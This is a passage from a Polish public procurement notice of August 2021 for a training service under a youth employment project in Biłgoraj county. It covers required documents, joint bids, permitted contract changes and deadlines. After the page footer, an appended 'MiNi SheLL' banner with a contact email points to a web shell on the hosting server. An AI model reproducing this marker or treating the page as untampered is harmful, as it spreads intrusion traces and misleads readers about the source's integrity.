SWZ.<br/>3) W zakresie wskazanym w pkt 6.1.4 ppkt 2) SWZ Wykonawca zobowiązany będzie do złożenia<br/>wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności<br/>odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich doświadczenia niezbędnego do wykonania zamówienia publicznego, a<br/>także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi<br/>osobami. Wykaz należy przygotować według wzoru określonego w załączniku nr 8 do SWZ."<br/>2. W przypadku, o którym mowa w pkt 6.3 i pkt 6.4 SWZ wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają<br/>poszczególni wykonawcy (art. 117 ust. 4 ustawy Pzp). Oświadczenie należy złożyć wg wymogów<br/>załącznika nr 5 do SWZ.<br/>3. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa<br/>wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji<br/>niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek<br/>dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi<br/>zasobami tych podmiotów. Szczegółowe wymagania dotyczące podmiotowych środków dowodowych<br/>określa SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Potwierdzenie umocowania do działania w imieniu wykonawcy lub podmiotu<br/>udostępniającego zasoby:<br/>a) zamawiający w celu potwierdzenia, że osoba działająca w imieniu wykonawcy lub podmiotu<br/>udostępniającego zasoby jest umocowana do jego reprezentowania, żąda złożenia wraz z ofertą<br/>odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej lub innego właściwego rejestru;<br/>b) wykonawca lub podmiot udostępniający zasoby nie jest zobowiązany do złożenia<br/>dokumentów, o których mowa w lit a), jeżeli zamawiający może je uzyskać za pomocą<br/>bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał dane umożliwiające<br/>dostęp do tych dokumentów.<br/>c) jeżeli w imieniu wykonawcy lub podmiotu udostępniającego zasoby działa osoba, której<br/>umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w lit a),<br/>zamawiający żąda od wykonawcy lub podmiotu udostępniającego zasoby złożenia wraz z ofertą<br/>pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania<br/>wykonawcy.<br/>2. Pełnomocnictwo do reprezentowania wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia w postępowaniu o udzielenie zamówienia albo do reprezentowania ich w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (jeżeli dotyczy). Sposób i<br/>forma złożenia pełnomocnictwa została określona w pkt 13.7 SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku,<br/>wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu<br/>o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie<br/>zamówienia publicznego.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>1) Oświadczenie, o którym mowa w art 125 ustawy Pzp (pkt. 8.1 SWZ) składa z ofertą każdy z<br/>Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak<br/>podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim<br/>każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>2) W przypadku, o którym mowa w pkt 6.3 i pkt 6.4 SWZ wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi<br/>wykonają poszczególni wykonawcy (art. 117 ust. 4 ustawy Pzp). Oświadczenie należy złożyć wg<br/>wymogów załącznika nr 5 do SWZ. Oświadczenie to jest podmiotowym środkiem dowodowym.<br/>3) Zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe i<br/>oświadczenia, o których mowa w pkt. 8.4 SWZ, przy czym podmiotowe środki dowodowe i<br/>oświadczenia, o których mowa:<br/>a) w pkt. 8.4.1 SWZ składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/ą<br/>spełnienie warunku udziału w postępowaniu,<br/>b) w pkt. 8.4.2 SWZ składa każdy z Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>3. Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia<br/>publicznego kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje możliwości wprowadzenia zmian do zawartej umowy na podstawie<br/>art. 454 – 455 ustawy Pzp oraz postanowień Projektu umowy.<br/>2. Projekt umowy stanowi Załącznik Nr 11 do SWZ.<br/>3. Zgodnie z projektem umowy:<br/>Strony dopuszczają wprowadzenie następujących zmian umowy zgodnie z art.455 ust.1 pkt 1<br/>ustawy prawo zamówień publicznych: 1) terminu wykonania zamówienia o czas niezbędny do<br/>jego prawidłowej realizacji – w przypadku niezrekrutowania grupy uczestników szkolenia z<br/>przyczyn niezależnych od Zamawiającego, np. braku osób zainteresowanych uczestnictwem w<br/>szkoleniu, rezygnacji osób zakwalifikowanych oraz z przyczyn uzasadnionych związanych z<br/>podejmowaniem działań związanych z zapobieganiem, przeciwdziałaniem i zwalczaniem<br/>koronawirusa; 2) harmonogramu szkolenia – w przypadku wystąpienia zdarzeń<br/>uniemożliwiających realizację dotychczasowego harmonogramu lub jego zmiany celem<br/>usprawnienia realizacji szkolenia. Zakres wprowadzanych zmian nie może być sprzeczny z<br/>opisem przedmiotu zamówienia; 3) ceny - w przypadku niezrekrutowania całej grupy<br/>uczestników szkolenia, w szczególności braku osób zainteresowanych uczestnictwem w<br/>szkoleniu, rezygnacji osób zakwalifikowanych, wówczas wynagrodzenie Wykonawcy może<br/>zostać pomniejszone proporcjonalnie o liczbę osób niebiorących udziału w szkoleniu; 4) numeru<br/>rachunku bankowego – w przypadku konieczności zmiany numeru rachunku bankowego na<br/>nowy rachunek bankowy; 5) osób wykonujących zamówienie – w sytuacjach losowych w<br/>szczególności wskutek długotrwałej choroby lub innych zdarzeń losowych uniemożliwiających<br/>osobom wskazanym do realizacji zamówienia przeprowadzenia zajęć. W takim przypadku<br/>Wykonawca zobowiązany jest do przedstawienia Zamawiającemu w formie pisemnej, faksem<br/>lub drogą elektroniczną powodów uniemożliwiających osobom wskazanym do realizacji<br/>zamówienia wykonania usługi oraz informacji na temat doświadczenia nowych<br/>osób. Nowe osoby wykonujące zamówienie powinny posiadać co najmniej takie<br/>doświadczenie jak osoba wskazana w ofercie; zmiana może dotyczyć wszystkich osób<br/>wykonujących zamówienie;<br/>6) miejsca wykonania zamówienia – w przypadku wystąpienia w trakcie szkolenia zdarzeń<br/>losowych w szczególności powodzi, pożaru, awarii, usterek technicznych w miejscu odbywania<br/>szkolenia uniemożliwiających prowadzenie zajęć (w szczególności brak zasilania w energię<br/>elektryczną, awarie wodno-kanalizacyjne) pod warunkiem że warunki lokalowe zaproponowane<br/>przez Wykonawcę nie będą gorsze od warunków wskazanych w ofercie; zmiana może dotyczyć<br/>wszystkich miejsc i adresów zamówienia; 7) materiałów szkoleniowych w przypadku braku<br/>możliwości zakupu wymaganej ilości podręczników, wstrzymania przez dane wydawnictwo<br/>druku pozycji książkowej wskazanej przez Wykonawcę pod warunkiem że nowe materiały<br/>przedłożone przez Wykonawcę nie będą gorsze pod względem jakości i treści merytorycznych<br/>od materiałów przedstawionych w ofercie a ich cena nie ulegnie zmianie; zmiana może dotyczyć<br/>wszystkich materiałów szkoleniowych; 8) zasad i sposobu realizacji i wykonania zamówienia na<br/>skutek zmian wytycznych dotyczących realizacji projektów finansowanych ze środków<br/>Europejskiego Funduszu Społecznego, zakres zmian nie może wykraczać poza zmiany tej<br/>umowy; 9) zasad i sposobu realizacji i wykonania zamówienia na skutek zmian umowy o<br/>realizację projektu pn. „Aktywizacja osób młodych pozostających bez pracy w powiecie<br/>biłgorajskim (VI)” zawartej pomiędzy Powiatem Biłgorajskim a Województwem Lubelskim w<br/>zakresie umożliwiającym zapewnienie zgodności z wytycznymi, w tym: a) zasad przetwarzania<br/>danych osobowych, b) wypowiedzenia umowy w związku z naruszeniem zasad przetwarzania<br/>danych osobowych.<br/>Strony dopuszczają również zmiany umowy w przypadkach i na zasadach określonych w art.454<br/>ust.2 ustawy PZP innych niż wskazane w ust.2 umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-20 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty dostępnego na ePUAP i udostępnionego również na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-20 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-18</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wymagania techniczne i organizacyjne dot. Korespondencji elektronicznej c.d.<br/>1. Sposób sporządzania i przekazywania ofert, oświadczeń, o których mowa w art. 125 ust. 1<br/>ustawy Pzp, podmiotowych środków dowodowych oraz innych informacji, oświadczeń lub<br/>dokumentów, przekazywanych w postępowaniu o udzielenie zamówienia publicznego określa<br/>Rozporządzenie Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu<br/>sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów<br/>elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452).<br/>2. Zamawiający przekazuje link do postępowania oraz ID postępowania jako załącznik Nr 13 do<br/>SWZ. Dane postępowanie można wyszukać również na Liście wszystkich postępowań w<br/>miniPortalu klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki<br/>Postępowania.<br/>3. W przypadku gdy dokumenty elektroniczne w postępowaniu, przekazywane przy użyciu<br/>środków komunikacji elektronicznej, zawierają informacje stanowiące tajemnicę<br/>przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu<br/>nieuczciwej konkurencji (Dz. U. z 2020 r. poz. 1913), wykonawca, w celu utrzymania w<br/>poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, wraz z<br/>jednoczesnym zaznaczeniem polecenia „Załącznik stanowiący tajemnicę przedsiębiorstwa” a<br/>następnie wraz z plikami stanowiącymi jawną część należy ten plik zaszyfrować (dotyczy<br/>składania ofert).<br/>SPOSÓB KOMUNIKOWANIA SIĘ ZAMAWIAJĄCEGO Z WYKONAWCAMI (nie dotyczy<br/>składania ofert).<br/>1. W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a<br/>Wykonawcami w zakresie składania dokumentów, oświadczeń, wniosków (innych niż oferta)<br/>zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem:<br/>1) dedykowanego formularza: „Formularz do komunikacji” dostępnego na ePUAP oraz<br/>udostępnionego przez miniPortal lub<br/>2) poczty elektronicznej.<br/>2. W przypadku korzystania z rozwiązania określonego w ppkt 1 dokumenty elektroniczne<br/>składane są przez Wykonawcę za pośrednictwem „Formularza do komunikacji” jako załączniki.<br/>Korespondencja przesyłana za pośrednictwem tego formularza nie może być szyfrowana. We<br/>wszelkiej korespondencji związanej z niniejszym postępowaniem prowadzonej za<br/>pośrednictwem miniPortalu zamawiający i wykonawcy posługują się nr ogłoszenia BZP lub<br/>identyfikatorem postępowania z miniPortalu (ID).<br/>3. Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych za<br/>pomocą poczty elektronicznej:<br/>1) wykonawca przekazuje dokumenty na adres poczty zamawiającego email:<br/>zamowienia@pupbilgoraj.pl:<br/>2) zamawiający przekazuje dokumenty na adres poczty elektronicznej wskazany w formularzu<br/>ofertowym wykonawcy, na co wykonawca wyraża zgodę wskazując ten adres w ofercie i<br/>zobowiązuje się do utrzymania jego funkcjonalności przez czas trwania postępowania.<br/>Domniemywa się, że dokumenty, oświadczenia i wnioski przekazane na adres poczty<br/>elektronicznej wskazany w formularzu ofertowym zostały doręczone skutecznie a wykonawca<br/>zapoznał się z ich treścią. W komunikacji prowadzonej za pośrednictwem poczty elektronicznej<br/>Zamawiający dopuszcza posługiwanie się numerem referencyjnym postepowania określonym w<br/>pkt 1.1 SWZ.<br/>4. Sposób sporządzenia dokumentów elektronicznych musi być zgody z wymaganiami<br/>określonymi w: 1) rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie<br/>sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów<br/>elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) oraz 2) rozporządzeniu<br/>Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych<br/>środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać<br/>zamawiający od wykonawcy (Dz. U. z 2020 poz. 2415).</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-08-12 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com